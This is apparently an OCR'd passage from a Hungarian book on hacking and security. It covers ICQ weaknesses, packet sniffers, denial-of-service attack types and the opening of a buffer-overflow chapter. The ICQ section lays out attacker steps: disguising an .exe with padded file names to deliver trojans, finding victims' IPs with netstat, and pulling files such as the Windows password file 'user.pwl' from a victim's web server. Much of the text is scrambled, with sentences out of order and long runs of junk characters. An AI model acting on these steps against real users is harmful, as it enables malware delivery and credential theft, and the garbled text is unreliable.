biztonsági kockázatként jelölik meg az ICQ-t. hogy „Nem.praktikus és veszélyes Az „I seek you" egy kommunikációs eszköz. amely. hogy pillanatnyilag békén hagyják.com/downloads/release. A leggyakrabban használt Windows-kliens mellett Linux alatt is több kliens létezik. Így a rendszer nem tud elindulni. akikkel rendszeresen szeretnénk kapcsolatot tartani. Az ICQ legnagyobb veszélye tulajdonképpen abban rejlik. Ezek közül is egyértelműen az IP a legfontosabb. amikor bejelentkezik a kommunikációba. A kapcsolati listára minden felhasználót bejegyezhetünk. egyszerűen a Find User alatt megadjuk a nevét. hogy „Van-e ICQ-d?" egyre gyakrabban kapjuk azt a választ. amelyen a kliens fut. . hogy a támadónak információkat szolgáltat az áldozatról. Az ICQ biztonsági kockázata azonban sokkal inkább annak a rendszernek a biztonságosságán múlik. Ha egy másik felhasználót keresünk. Ez a szám a Universal Identifier Number.Ezt a mailt elég kijelölni és belenézni. A felhasználóknak észnél kell lenniük. hogy csak a fontosabbakra szorítkozzunk. Azok a támadások is kedveltek. a Mailbombák alatt. Ezért ez sem jelent biztos védelmet. ofíline-ban. az Offline.biztonsági kockázat? Az utóbbi időben elszaporodtak azok a vélemények. 1. 2. Ráadásul az ICQ-t ért különböző remote-buffer-overflow-k és DoStámadások is ismertek.

4. hogy a támadó küld a usernek egy fájlt.2 Milyen biztonsági rések vannak? Korrupt linkek A különböző linkek megnyitása az ICQ-felhasználónál aktiválhat egy fájlt.com/link. pl.jpg. A trükk a következő: a támadó kitömi a def. def.exe Az exe fájlból semmit sem látni *-ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *ADADADADADADADAD h»ADADADADADADvADADADADADADADADADADADvADADADADA |*>DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D i*-ADADADADADADADAD *»D D D D D A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD ^A£)A£)A£)A£>A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A ^A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A A A A A . Bizonyos parancsokkal összefüggésben azonban az egész merevlemezt is formattálhatják.exe fájl nevét egy sor üres karakterrel. például egy trójait vagy egy vírust. egy trójait vagy egy vírust stb.jpg . a fogadónál megjelenik egy popup ablak a fájl megnevezésével és más. A link így nézhet ki: http://www. itt nem lényeges információkkal. Ha elküldi ezt a fájlt. És itt is működik az ott már leírt trükk: tegyük fel. Fájlnevek kitömése az ICQ 99 alatt Ahogy mailben.asp? A DADADADADADADADADADADADADADADADADADADADADADAD *-ADADADADADADADAD ^A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A *-DADADADADADADADAD *ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *»ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA *-DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *-ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA DADAD!Ü! pl A£)A£)A£)A£)A£)VA£)A£)A£)» *DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D ^•ADADADADADADADAD *ADADADADADADvADADADADADADADADADADADvADADADADA *»DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D ta»A£)A£)A£)A£)A£)A£)A£)A£) Védelem Ez ellen úgy lehet védekezni. amelyeket nekünk küldenek.8. Egy ilyen támadást hajtottak végre például tesztcélokból egy Windows 98 és egy 2000 platform „ellen". úgy ICQ-val is lehet fájlokat küldeni és fogadni.yahoo. hogy azonnal eldobja az ismeretlen linkeket. hogy az ICQ-kliensünket úgy állítjuk be.

82. Az így jelzett webszerver ugyanis behatolási pontot nyújthat a támadónak. hogy tényleg csak egy képet akarnak küldeni neki. Ha a támadó például egy trójait vagy egy vírust használt.82. Az ICQ hibajelzéseket ad. ha elfogadja és végrehajtja a fájlt. Megnézni egy felhasználó fájljait Itt megintcsak előfeltétel.172. hogy a rendszeres frissítés legalább rövid távon védelmet kínál. ráadásul anélkül. Most teljes nyugalomban megfigyelheti az áldozatát.40:80. Ez az ICQ-path megadása után a kontaktlistára bejegyzett userek minden IP-jét visszaadja. és most is megjegyzendő. inaktiválja az ICQ-t. Rendesen ugyanis kap egy értesítést. Ezután egyszerűen Quit-et ír a Telnet kliensbe. Egy ilyen jel a hackernek égből pottyant ajándék. Az . Amint az ICQ a kérdésre pozitív választ ad. hogy felkerült egy listára. amelyet hozzá akar fűzni.Így a popup ablakban már nincs elég hely. Letölt magának egy ICQ-cracket az internetről. A felhasználó azt gondolja. egyetlen kattintással kijelöli a személy nevét. Ezt többnyire a fenti ikonra történő kattintással vagy a http://ipdesusers. Itt az IP! Az ICQ lefagyasztása ICQ alatt megmutathatjuk más felhasználóknak. User hozzáfűzése engedély nélkül Az ICQ jóváhagyása időnként elég terhes a támadóknak. Vagy a támadó a partnerrel való beszélgetés közben egyszerűen beírja a parancssorba: netstat -n. Ha a hackernek csak az áldozat IP-je van meg. és megpróbál hozzáfűzni egy felhasználót. ahol a 217. Ezután meg kell szakítani a kapcsolatot a hálóval. Ezt a problémát elkerülendő. Ha ezt elintézte..172. a támadónak a következő lehetőségei vannak. akkor a felhasználóból. megpatcheli a crackkel. amelyek azt mondják.40-et a megtalált IP-re cseréli. hogy működtetünk-e webszervert a rendszerünkön. anélkül. Ha ez sikerült. linkkel lehet elérni. hogy megtámadja ezeket a rendszereket. a Find User-rel megkeresi azt az UIN-t. vagy ha akarja. a támadó már ott van a kívánt személy kapcsolati listáján.exe már nem látható. hogy ő bármit is észrevenne ebből. amelyek lehetővé teszik a felhasználó felvételét a kapcsolati listára anélkül. hogy az ICQ nem tud üzeneteket küldeni. Ezáltal az áldozat ICQ-ja bezáródik. akár meg is támadhatja. . amely közli. amit gyakran ki is használ. Ez egy jó példa volt az ICQ kliens még fennálló bizonytalanságaira. Ezért a legjobb védekezés az aktuális verzióra történő frissítés. hogy a felhasználó egy webszervert telepített. hogy az erről bármit is tudna. ha egy áldozatot akarnak felvenni a kontaktlistájukra. és a tulajdonképpeni végződés. és a hacker ismerje az IP-jét. könnyen áldozat lesz. és egy idő múlva nem jelenik meg online-ként. Az interneten ehhez egész sor tool és crack van. Védekezés Az ICQ rendszeresen dolgozik chat-rendszere biztonságán. Mire minden hibaüzenetet tudomásul vettek. hogy többet megtudjon a chat-partneréről. a Next-re kattint. hogy az áldozat ezt észrevenné. Egy erre a célra szívesen használt eszköz a UIN-IP. a parancssorba a következőt írja: Telnet 217. az . Védelem Ez a bug az ICQ 2000-ben már nincs benne.exe végződés helyett csak a -jpg-et látjuk.

így a jelszavak elérésére is van lehetőség.172. hogy a C:\-hez jusson.82. mert a támadó nem fogja ismerni a pontos könyvtárstruktúrát. ne használjuk ezen a gépen az ICQ-t. Természetesen ez csak egy példa. .html/.82. Most a támadó a számítógépére tudja menteni a kiválasztott fájlokat.Most például beírhatná a böngészőjébe: http:// 217. Védekezés Ha webszervert kell futtatnunk.172.40 az áldozat IP címe. ahol a 217.pwl. user. A legtöbb esetben azonban a Windows szabvány könyvtárstruktúrája fordul elő. A pontok a könyvtárakat jelölik. amelyekre váltani kell.40 /.

9.1 9. fejezet .2 9.3 9.Tartalom 9.4 Mi az a sniffer? Hogyan működik egy sniffer? A sniffer veszélyei Mit lehet tenni a snifferek ellen? .

Ezért a legtöbb sniffert úgy tervezték.9 Sniffer A snifferek jelentik az egyik legnagyobb veszélyt a hálózatokra. Az adatokat csak az a számítógép veszi fel. Így a sniffer hozzákezdhet a tulajdonképpeni munkájához.2 Hogyan működik egy sniffer? Egy számítógép valamennyi hálózati interfészének saját címe van a LAN-on. ethernet frame-nek is nevezett csomagokban kerül a hub-ra. amelyiknek címezve vannak. hogy csak a valóban releváns adatokkal foglalkozzon. amely a hálózati interfészt úgynevezett promiscuous módra állítja át. külön kis. aki installálta a sniffert. A snifferek a WWW/LAN/WAN egyes gépeire telepíthetők. Ha elküldünk egy üzenetet. Hasonló rendszert találunk az internet-címzésnél is. Ezen a ponton avatkozik be a sniffer. a Banyán VINES és az LCC. az IPX. Ebből a fejezetből kiderül. Egyrészt a rendszergazdák pótolhatatlan segítőtársai a hálózati problémák vagy a potenciálisan veszélyeztetett területek felderítésében. Annak persze nem lenne értelme. melyek a snifferek felhasználási területei. és milyen gondokat okozhatnak. az Apple Talk. hol van a probléma a hálózaton belül. Ezek. A hálózatban gyakran használnak hub-ot az adatok szétosztására. A felhasznált sniffertől függően különböző protokollokat lehet lehallgatni. de a nem neki szóló címzés miatt nem dolgozza fel azokat. akkor a rendszergazda bevethet egy sniffert. lehetnek például jelszavak vagy felhasználói nevek. hogy a hálózat teljes adatforgalmát kiértékelje. Ez a mód bizonyos alkalmazásokon keresztül akkor is megengedi a csomagok felvételét és feldolgozását. betekintést kínálva annak. és rendszerint egy fájlba írják az analizált adatokat. Másrészt a snifferek lehetőséget nyújtanak a támadóknak. az Az Analyzer az egyik legismertebb sniffer . hogy egész hálózati csomagokat „hallgassanak le". Az elfogott információkat a sniffer az output (kimeneti) fájlokba menü. ha azok nem az illető gépnek vannak címezve.1 Mi az a sniffer? A sniffereknek különböző felhasználási területeik vannak. hogy mit is rejt ez a fogalom. a sniffer tulajdonságaitól függően. Ha például gondok támadnak a hálózat egy részében a hiányos konfiguráció miatt. mert a legtöbb információ egyáltalán nem érdekes. Ezek közé tartoznak többek között: a TCP/IP (Ethernet/WWW). naplózzák az adatfolyamot. 9. Ez különbözteti meg a komputert a hálózat többi tagjától. 9. A többi hálózati interfész ugyan fogadja az adatokat. és onnan továbbítódik minden csatlakoztatott számítógépre. hogy magállapítsa.

kevéssé hatékony. Ezeknél jelszavak kiosztásáról van szó. hogy csak a címzett gép tudja dekódolni. a normál hubokkal ellentétben. A csatlakozások ellenőrzése A rendszergazda is ellenőrizheti a LAN-ban található számítógépek hálózati kártyáit promiscuous módra vagy egyéb gyanús alkalmazásokra. mint az S/Key vagy a SecurelD-Token. Ipv6 Hamarosan megjelenik a TCP/IP új verziója. Ha azonban a támadó egy. 9. Intézkedés Adatelosztás Leírás Egy sniffer támadási pontját tulajdonképpen a hubnak az a tulajdonsága nyitja meg. és a felhasználók sem veszik szívesen. amelyek csak egyszer érvényesek. akkor jól be lehet határolni azt a számítógépet. Így azután nem is szükséges közvetlenül beavatkozni egy meghatározott felhasználó rendszerébe ahhoz. Sajnos ez az eljárás elég költséges. amelynél az adatok hálózati szinten lesznek kódolva. éppúgy. amit a sniffelés után magával visz. A leleplezéshez csak a rendszergazdáknak vannak különböző programjaik. amely Ipv6 vagy IPng néven ismert. a reakcióideje hosszabb lesz az általában szokásosnál. hogy a fogadott adatokat minden vele kapcsolatban álló számítógépnek elküldi. mert ezeket bármikor megtudhatja a sniffer. a hub-ok helyett switcheket vagy auto-switching hub-okat is használhatunk. mint amilyen az SSH vagy az SSL. Ezért a normál hálózati felhasználó aligha tudja felfedezni a sniffert a LAN-on. hogy kikémleljék mail-postafiókja vagy online banki jelszavát. Felhasználói oldalról titkosító protokollokkal. Ezeket használják akkor is. mint a fentiek. a 3Com. vagyis passzívan működnek. ha a hálózati kártya promiscuous módban van. amely szintén kódolva továbbítja az adatokat. A mail-postafiókok elleni támadásoknak is van egy biztos ellenszere. Az olyan biztonsági intézkedések.3 A sniffer veszélyei A snifferek nagy veszélyt jelentenek a hálózati struktúrára. a megoldás kézenfekvőnek tűnik: csak olyan hálózati kártyát szabad használni. azonban ahogy ez a protokoll majd szabvánnyá válik a hálón. Részletesen most nem foglalkozunk az Ipv6-tal. Ha egy hálózatban rendszeresen tesztelik az egyes csatlakoztatott számítógépek reakcióidejét. Titkosítás Az alkalmazásokban használt kódolás minden bizonnyal a legfontosabb védelem a sniffer-támadások ellen. Ilyen kártyákat (is) kínai pl. . az S/POP nevű eljárás. mégpedig úgy. mint hogy nem tároljuk a jelszavakat a merevlemezen. védhetjük az adatainkat a siffherek ellen. ez a variáció. A reakcióidő ellenőrzése Ha egy számítógépre. állandó jelszavuk.9. amelynek a hálózati interfésze promiscuous módban van. Ha biztosra akarunk menni. amelyekről a továbbiakban még írni fogunk. az IBM. amely nem engedélyezi ezt a módot. Intézkedés Hálózati kártya Leírás Egyszerűbb és olcsóbb megoldás megfelelő hálózati kártyával felszerelni a LAN-ra csatlakoztatott számítógépeket. ráadásul csak a támadó gépén futnak. Vannak programok. amelyik potenciális sniffer lehet. A snifferek a normál felhasználó szempontjából semmilyen nyomot nem hagynak maguk után. amelyek. a hálózatba integrált notebookot használ. amikor egy hálózat teljesítményének a gyenge pontjait keresik. tulajdonképpen semmit sem érnek. ha van egy saját. Ez a protokoll Ipsec-et is tartalmaz. adatokat küldenek. Nagyobb hálózatoknál megfontolandók az olyan biztonsági mechanizmusok. mert a teljes hálózati adatforgalmat felügyelhetik. a Hewlett-Packard és az Intel. a snifferek problémája is meg fog szűnni (egy időre). Ezek az eszközök azonban drágábbak az egyszerű hub-oknál. amelyek tesztelni tudják a hálózati reakcióidőket. valóban csak a célgépre továbbítják az adatokat. Mivel egy sniffer csak úgy tud működni.4 Mit lehet tenni a snifferek ellen? A snifferek felfedezéséhez és eltávolításához jól kell ismerni a hálózati topológiát. A döntően hálózati felhasználás azonban alapvetően nagyobb ráfordítást igénylő intézkedéseket tesz szükségessé. Az alábbi táblázatból részletesen megismerhetők a védelmi mechanizmusok. Titkosítással biztonságossá lehet tenni az adatátvitelt. mert jobban szeretik.

így ezt is minden sniffer foghatja. mivel ott az adatok eleve kódolva továbbítódnak. amely mint snifftest. új lehetőséget kellett fejleszteni.Intézkedés Leírás A HTTP-átvitelek titkosítására szolgál az interneten az SSL (Secure Socket Layer). A szokásos Telnet-kliensek helyett SSH-klienset (Secured Shell) is lehet használni. ha egy másik számítógép éppen sniffel. Ilyen program pl. Tehát figyelni kell arra. például a jelszavakat és a parancsokat is. akkor a megnyitáshoz szükséges jelszó megint csak a hálózaton megy keresztül. Vannak azonban olyan programok is. mégsem kínálnak lehetőséget az adatok kódolására. amelyek azt a számítógépet ellenőrzik. ha a fájlok megnyitása a saját gépen történik. Már böngészőket is lehet kapni megfelelő erős kódolással. Az ilyen programokkal szemben azonban mindig egy kicsit szkeptikusnak kell maradni. Anti-sniffer' A hálón a legkülönbözőbb programokat kínálják a snifferek felkutatásához. amelyek felhívják a figyelmet az ilyen támadásokra. Védelmi Intézkedések a snifferek ellen Végeredményben azonban mindig lesznek programok. SSL SSH Mivel a Telnet kódolatlanul továbbítja az adatokat. Mivel a legtöbb felhasználó nem szívesen használ manuális kódolást. így a sniffer nem tud mit kezdeni velük. hogy milyen szolgáltatásokat veszünk igénybe a kevéssé biztonságos hálózatokon keresztül. Unixhoz/Linuxhoz a Beavis and Butthead. Igazán csak az IPv6 használatával lehet majd biztonságos adatátvitellel számolni.c is ismert. elérhetik ugyan a céljukat. Az olyan programok. vagy olyan programokat használnak. . mert többnyire csak bizonyos hálózati kártyák búgjait ellenőrzik. amelyen éppen lokálisan rajta vagyunk. Ha azonban a PGP-vel kódolt maileket a mail-szerveren nyitják meg (ami biztosan gyakran megtörténik). csupán mail-szolgáltatást kínáló szolgáltató csak üzletileg kínálja az SSL használatát. A PGP-vel vagy hasonló programokkal kódolt fájlok/mailek biztonságában is csak akkor lehet bízni. amelyek ugyan hálózatról működnek. Az e-mail-küldésnél mindenesetre problematikus. a kódolási folyamatnak automatikusnak is kellene lennie. de nincs nagy hasznuk. amely csak biztonságosan kódolva továbbítja az adatokat. amelyek leleplezik. hogy védetten lehessen bejelentkezni a Telnetről. hogy sok.

6 10.Distributed Denial of Service támadások Védelem a DoS-támadások ellen .8 10. fejezet.10.5 TCP-Syn-Flooding 10.Tartalom 10.9 Ping-Flodding Smurf DDoS .4 Az IP-spoofing mint előfeltétel Out-of-Band csomagok .7 10.3 10.2 10.a „nuken" Large Packet-támadások avagy a Ping of Death Land támadások 10.1 10.

Kedvelt célok azok a felhasználók is. két napon belül indították a Yahoo. ha a támadó nem talál más utat.2 Out-of-Band csomagok . Ezért az Out of Band csomagokat az olyan rendszerek megtámadásához használják. mert csak a szervezethez kapcsolódó rendszerekből érkező támadásokat akadályozza meg. Vagy már a támadást is ez teszi lehetővé. Sajnos. amelyeknek többnyire jól kezelhető. hogy egy rendszert újraindításra kényszerítsenek valamilyen változtatás érvénybe léptetése érdekében (jelszó: trójai). Ha a 135. aki két napig bombázta a Yahoo-t és társait.Telnet session-ökhöz használják. A DoS-támadások az operációs rendszerek.10 A Denial of Service támadás A DoS. Az IP-spoofing. amelynél hamis IP-számot használnak. és ezeken egyenként körülbelül 40000 karaktert küldenek. A Microsoft felismerte ezt a hibát. hogy a támadó nyomait eltüntessék. a rendszer összeomlik. A WinGatesszerver feltételezi. sok DoS-támadás alapját képzi.(Denial of Service -. A DoS-támadások célzott végrehajtásának másik oka lehet például. vagy arra szolgál. és a 139. A rendszerek kiesése következtében fellépő kár mintegy 100 millió dollárra rúgott. és úgy lefagyasztják. mind a 2000-t ellenállóvá tette e támadások ellen. akik game-szervereken vagy IRC-szervereken találhatók. és . Megengedi az adatok átvitelét a normál sorrenden kívül. például a webszervereket. hogy ezeknek a támadásoknak különböző fajtái vannak.a „nuken'' A legismertebb DoS-támadások közé tartozik a miken vagy az Out-ofBand (OOB) csomagok küldése.többek között . és mind a Windows 98/98SE/ME-t.szolgáltatás megtagadó) támadások az internet egyik legnagyobb veszélyforrásává váltak az idők során. hogy a rendszert egy időre lebénítsa. programok és protokollok hibáit használják ki. DoS-támadásokat többnyire akkor hajtanak végre. ami azt jelenti. hogy hamis identitást színleljenek a megtámadott IT-rendszer felé. A különböző támadásokhoz egész sor eszköz áll a támadók rendelkezésére. 1998-ban létrejött egy védelmi szervezet. Az egyik legismertebb támadást 2000 februárjában. . A WinGates 4. 10. Egy ilyen támadásnál számítógépeket rohannak le az interneten. Így a támadót. hogy a rendszert lerohanja.1 Az IP-spoofing mint előfeltétel Az IP-spoofing egy támadási eljárás. ez csak egy behatárolt megoldás. amelynél a csomag feladójának a címét megváltoztatják. az eBay. csak a hencegése alapján kapták el egy idevágó chatszobában. hogy az egy ideig nem is tudja újrakezdeni a működését. így a támadónak még alaposabb technikai ismeretekkel sem kell rendelkeznie a használatukhoz. mint például a WinGates.01-t például így lehetne megtámadni: 100 kapcsolatot állítanak elő a WinGates-hez. hogy minden Kettő a legismertebb nukerek közül 10. amely lehetetlenné teszi hamisított IP-csomagok internetre küldését a csatlakoztatott hálózatüzemeltetőknél. portok egy számukra nem értelmezhető karaktersort kapnak. A DoS-támadások ugyanúgy érintik az internet-felhasználókat. grafikus felületük van. vagy ha éppen az a célja. Az Out of Band csomagok felhasználását a DoS-támadásokhoz a Microsoft egy hibás NetBEUI implementációja tette lehetővé. a CNN és néhány más nagyobb portál ellen a hálón. mint a szervereket. Az OOB a TCP/IP egyik tulajdonsága. és ezzel a protokollal továbbítódik. Az eredmény azonban mindig ugyanaz: a megtámadott számítógép felmondja a szolgálatot. és megakadályozzák az azonosítását.

Az Internet Protokoll headerrel (fejléccel) együtt pontosan 65535 bájtot csomagol egyetlen csomagba. A TCP-Syn-Flodding támadásnál a támadó először hamis feladóval nagy számú SYN-csomagot. elküldi az ACK l-et. . Minden csomagtöredék tartalmaz egy offset értéket és egy azonosítási számot. hogy egyszerűbb legyen az átvitelük. • A támadó elküldi a SYN 2-t. és aztán újra reassemblálja (összerakja) őket.5 TCP-Syn-Flooding Mint ahogy a Land támadásoknál már leírtuk. az Ethernet-csomagok pedig csak 1500 bájtosak. 10. hogy milyen csomagról van szó. A támadásnak ezt a fajtáját az elkészült bugfixekkel ma már a legtöbb operációs rendszer visszaveri. a résztvevők először egy Three Way Handshake-et váltanak.3 Large Packet-támadások avagy a Ping of Death A Denial of Service támadások különösen végzetes fajtája a Ping of Death. és várja a választ. hogy egy rendszert hatalmas adatfolyammal terheljenek. egy ilyen támadás lefolyásának a sémája. vagyis feldarabolja. de ezt a csomagot most egy saját nyitott portjára fogja küldeni. amely meghatározza. Röviddel a halálos lökés előtt Mikor egy számítógép kapcsolatot próbál felépíteni egy másikkal. valamint a portszám. • A host válaszol a SYN 2-re. • És így tovább. és válaszul ACK-csomagot (ACK = Acknowledgement = a fogadás nyugtázása) küld. hogy az adatok át tudjanak futni a különböző hálózati rétegeken. Mindez azért történik. az rövid időn belül felmondja a szolgálatot. Aki viszont Land támadást hajt végre. amelyekkel bejelenti a kapcsolatot. Ezek ellen a támadások ellen is régóta létezik már bugfix.4 Land támadások A Land támadások a TCP-implementáció egy hibáját használják ki ahhoz.a feladó címe megegyezik a címzettel. • A támadó elküldi a SYN 3-at. 10. hogy a hostot rettenetes mennyiségű további SYNcsomaggal bombázza. Ez utóbbinak semmi köze a tulajdonképpeni ping-parancshoz. amíg el nem használja a szerver pufferét. out of buffer hibaüzenetet kap. amely a teljes csomagot nagyobbnak mutatja 65535 bájtnál. vagyis „Beszélni akarok veled" üzenetet küld a hostra. Az ennél nagyobb csomagokat fragmentálja. Ez a kísérlet azonban. A címzett reagál erre. akkor speciális IP-csomagokat küld. és az adattömeg addig halmozódik. a nemlétező feladó miatt. A szerver minden SYN-csomagra ACK-csomaggal válaszol. hogy az utolsó töredéknek olyan offset értéket lehet adni. UDP és TCP. • A host válaszol a SYN l-re. sikertelen lesz. íme. Ezt a folyamatot Three Way Handshake-nek is nevezik. Ezeket SYNcsomagoknak is nevezik. kész vagyok" ACKválaszcsomaggal nyugtázni. Ez a következőképpen történik. és megbénítja az áldozat rendszerét. Ha most a rendszergazda megpróbál belépni. és várja a választ az ACK l-re és 2-re. majd összeomlást idézzenek elő. és a gép összeomlik. ahol a sok IP-stack egyfajta túlcsordulást idéz elő. A host ezt megpróbálja egy „OK. a protokoll-implementáció említett hibáját kihasználva. és a számítógép bizonyos várakozási idő után eredménytelennek nyilvánítja a kísérletet. Az első csomagban még egy TCP-header is található. Ez a túlméretezett csomag túlcsordulást (Buffer Overflow-t) okoz a rendszerben. Ha ezt a várakozási időt a támadó arra használja. 10. amelyről ebben a fejezetben még szó lesz. • A támadó elküldi a SYN l-et. hamisított feladóval küldi a SYN-csomagokat egy szerverre . Ezek a tények teszik lehetővé.kapcsolat fennmarad. és előállítani a kapcsolatot. A Ping of Death támadások a következő protokolloknál lehetségesek: ICMP. ha két számítógép között TCP/IP-n keresztül jön létre kapcsolat. elküldi az ACK 2-ét.

Legyen az szerver vagy normál felhasználó . Ez bizony rengeteg választ jelent. hogy mindig legyen aktuális vírusvizsgáló a gépünkön. ezeket feltölti scriptekkel vagy programokkal. A segítségükkel el lehet kapni a módosított csomagokat. 10. visszhangszerű választ ad.minden esetben érvényes. A gyártók előbb vagy utóbb felfedezik az operációs rendszerekben és a szerverszoftverekben a biztonsági szempontból gyenge pontokat. Ha ilyen módon másodpercenként 1000 pinget küldenek 1000 különböző számítógépre. A 2000. hanem arra is használhatják a támadók. hogy sor kerüljön a további feldolgozásukra. amelyeken biztosítani tudja magának a rendszergazdai jogokat.org és a gyártóéra.) Ha elegendő kiszolgálót talált. hogy a támadó a lehető legtöbb olyan rendszert megtalálja.10. Előkészület egy DDoS támadásra 10. Hogy a gyenge pontok dolgában mindig képben legyünk. Ezeken a rendszereken trójaiakat helyez el. az áldozatéi.7 Smurf A Smurf-nél a támadó egy hálózat broadcast címére küld egy pinget manipulált feladócímmel.9 Védelem a DoS-támadások ellen A normál felhasználó számítógépe nemcsak áldozata lehet a DoStámadásoknak. és ha elérhető. hogy minden választ az áldozat kap meg. és meg lehet akadályozni. a host pedig valamennyire megpróbál válaszolni.cert. mítógépeket. (A trójaikról a 4. februári híres DDoS támadások óta állandóan növekszik az ilyen jellegű támadásokra alkalmas programok száma a Yahoo. és rövid idő múlva frissítést kínálnak hozzájuk. hogy fel tudja tölteni a scripteket a támadáshoz. amelyre minden. amitől az összeomlik. azt eredményezik. az eBay és társai ellen.vagy ISDN-csatlakozás) is térdre tudnak kényszeríteni nagy átviteli sávszélességgel rendelkező áldozatokat. hogy távirányítani tudja a szá- . Smurffel akár nagyon kis átviteli kapacitással rendelkező támadók (modem. Ráadásul a ping-flodding támadásokat az áldozat csak akkor fogja észrevenni. Ezek azonnal tájékoztatnak az újabb gyenge pontok felfedezéséről. a broadcast cím mögötti számítógép válaszol. hogy megállapítsák egy host elérhetőségét. hogy rajta keresztül hajtsák végre más rendszerek ellen a támadásokat. az áldozat több mint egymillió választ kap. és beszerzési forrást kínálnak a megfelelő frissítésekhez. A DoS-támadások ellen a jól konfigurált tűzfalak is védelmet kínálnak.6 Ping-Flodding A pingeket az interneten és a hálózatokban használják. Az érintett rendszer a bemenő adatok terhe alatt szó szerint összeomlik. 10. és ezeket arra használja. érdemes előfizetni a Computer Emergency Response Teams (CERT) levelezőlistájára http://www. Ehhez a támadó hibás rendszereket keres szkenneléssel (közelebbit lásd a szkennelésről szóló fejezetben). Ezt használják ki a támadók a Ping-Floddingnál. hogy az áldozatát nagy mennyiségű adatcsomaggal szembesítse. illetve a programokat többnyire trójaiak segítségével telepítik a rendszerekre. hogy mindig tájékozódni kell a mindenkori operációs rendszer biztonságot érintő frissítéseiről.8 DDoSDistributed Denial of Service támadások A DDoS-nál (DDoS-támadás = elosztott szolgáltatás megtagadó támadás) még a tulajdonképpeni roham előtt szerez a támadó elérést néhány másik rendszerre. Pingekkel bombázzák a célt. a host nem tud több kérdésre válaszolni. ha a szolgáltatója a forgalom szerint számol el. Az előkészítés abból áll. Ha az ismétlés elég gyakori. A megváltoztatott feladócímek. fejezetben írtunk. ezért is elengedhetetlen. s az áldozatot csomagok áradatával önti el. Az ilyen támadások után többnyire teljesen le kell venni a szervert a hálózatról. Megpingelünk egy hostot. A scripteket.

3 Minek kell a Shellcode változónál állnia? 11.5.Tartalom 11.2 Adatok 11.11.3 11.1 Hogyan lehet ezt kihasználni? 11.2 A Buffer-Overflow-támadások 11. 11.4 11. fejezet .1 Az operációs rendszer memóriakezelése 11.1.1.5.1.1 Szöveg 11.2.3 A stack (magyarul: halom/rakás) 11.2.2 A Buffer-Overflow-k és a tűzfalak .5 Áldozat a Buffer-Overflow-kért Honnan lehet felismerni a Buffer-Overflow-t? Milyen védelmi mechanizmusok vannak? 11.2.1 Összefüggés a CPU és a Buffer-Overflow között.2 Hogyan működik? 11.

1. 11. amelyben a normál változók adatai találhatók.1. szintén a stackben tárolódnak (például a szegmensek kezdő címei. ahol legfelül van a 10. Egyes esetekben ez akár a boot-jogokig terjedhet. ahelyett. ha egy eljárás vagy függvény lefutott.3 A stack (magyarul: halom/rakás) A stacket elképzelhetjük úgy. Ennek következtében az . A stack szerkesztésének legfontosabb assembler parancsai a PUSH (adatokat tesz a stackhez) és a POP (olvassa a stack legfelső elemét). ellentétben a FIFO-elvvel (first in. amelyek már nem férnek be a pufferba.. Ebben leírta. egy bizonyos szolgáltatást összeomlásra kényszeríteni.1 Szöveg Egy adott programhoz rendelt memóriatartomány több részre oszlik. amelyekre egy program futása ugrik. Az alsó memóriában illetve a szövegrészben csak karakterláncok vannak tárolva. megpróbálja beleírni. hogyan vezethet a rossz programozás biztonsági résekhez. mint egymásra halmozott lapokat.static"-ként deklarálódnak. first out). Azokat az adatokat. de távoli eléréssel is. amelyeket aztán puffer-túlcsordulásos. first out) működik. hogy később speciális jogokat szerezzenek a szerverhez. amelyet egy program kiad. amelyek legfelül helyezkednek el (tehát utoljára kerültek oda).11 Buffer-Overflow 11. 1996-ban az AlephOne Bugtraq levelezőkör moderátora cikket közölt Smashing the Stack for Fun and Profit címen. Ezt úgy csinálják.2 A Buffer-Overflow-támadások A Buffer-Owerflow tulajdonképpen annyit jelent. mint amennyit az fel tud dolgozni. Így végre lehet hajtani fizikai hozzáféréssel a szerverhez. A címek. hogy az elemek.2 Adatok Az adatrész inicializált és inicializálatlan adatokra osztható. amelyek .1 Az operációs rendszer memóriakezelése Az alábbi vázlat egy operációs rendszer memóriafelépítését szemlélteti. A stack LIFO-elven (last in. Ez azt jelenti. Alsó memória SZÖVEG inicializált adatok inicializálatlan adatok Felső memória STACK Memóriafelépítés 11. A Buffer-Overflow-rohamokat arra használják. 11. Ennek a hozzárendelt területnek a méretét a „brk" paranccsal lehet megkapni. hogy támadásokat hajtsanak végre szerverek ellen. hogy többet írnak a pufferbe. amelyekkel az egész számítógép felett ellenőrzést szereznek. Más elérések „segmentation fault" hibával végződnek. vagyis ezeken nem lehet változtatni. hogy eldobná a program. A legérdekesebb ezekben a támadásokban a Buffer-Overflow-rohamok függetlensége a támadó székhelyétől. hogy kidöntsenek egy weboldalt. Ezzel egymásra épülő célokat lehet elérni: pl. számú lap.1. mint amilyennel például a pipe-nál találkozhatunk. A stack az a memóriaterület. 11. Ezeket a karakterláncokat az operációs rendszer „readonly"-ként kezeli. vagyis Buffer-Overflow támadásokhoz lehet felhasználni. elsőként kerülnek ki.) Erről azonban később. számú és legalul az 1. például a Súgó szövege. De arra is lehet használni ezeket a támadásokat. hogy megöröklik a megszakított szolgáltatás jogait.

